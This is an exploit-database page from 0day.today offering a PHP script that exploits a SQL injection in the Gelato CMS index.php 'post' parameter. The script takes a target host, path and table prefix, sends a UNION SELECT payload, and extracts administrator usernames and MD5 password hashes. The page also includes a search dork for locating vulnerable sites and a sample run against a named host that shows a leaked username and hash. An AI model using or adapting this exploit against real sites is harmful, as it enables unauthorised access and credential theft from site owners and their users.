[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Gelato (index.php post) Remote SQL Injection Exploit

Author
s0cratex
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2138
Category
web applications
Date add
13-09-2007
Platform
unsorted
====================================================
Gelato (index.php post) Remote SQL Injection Exploit
====================================================




<?
#_ Gelato SQL Injection exploit
#_ Dork: "powered by gelato cms"
#_ Homepage: http://gelatocms.com

#_ [ s 0 c r a t e x ]
#_ msn: s0cratex[at]nasa[dot]gov
#_ greetz: D.O.M and plexinium team

ini_set("max_execution_time",0);

function get_text(){
  $in = fopen("php://stdin", 'r');
  $text = fgets($in, 1024);
  $text = trim($text);
  return $text; }

echo "Gelato SQL Injection exploit -- by s0cratex\n";
echo "-------------------------------------------\n\n";

echo "Host (site.com): ";
$host = get_text();

echo "Path (/gelato): ";
$path = get_text();

echo "Prefix (gl_ / gel_): ";
$prefix = get_text();

if($host && $path && prefix){
$cnx = fsockopen($host,80);
if($cnx){
fwrite($cnx,"GET
".$path."/index.php?post=-1/**/union/**/select/**/1,concat(0x7330633a3a,login,0x3a3a,password,0x3a3a),null,null,null,null,null/**/from/**/".$prefix."users/*
HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx)){ $resp .= fgets($cnx); }
fclose($cnx);

$login = strstr($resp,"s0c");
$login = explode("::",$login);
if(is_null($login[1]) || is_null($login[2])){ die("\nExploit failed... check
the prefix..."); }
echo "\nUsername: ".$login[1];
echo "\nMD5 Hash: ".$login[2];
} else { die("\nConection problems..."); }
} else { die("\nPlease check the data..."); }

/*
Gelato SQL Injection exploit -- by s0cratex
-------------------------------------------

Host (site.com): gelatocms.it
Path (/gelato): /
Prefix (gl_ / gel_): gel_

Username: wolly
MD5 Hash: 2eb7401af28ae266360b6028a26cc97a */

?>



#  0day.today [2024-12-24]  #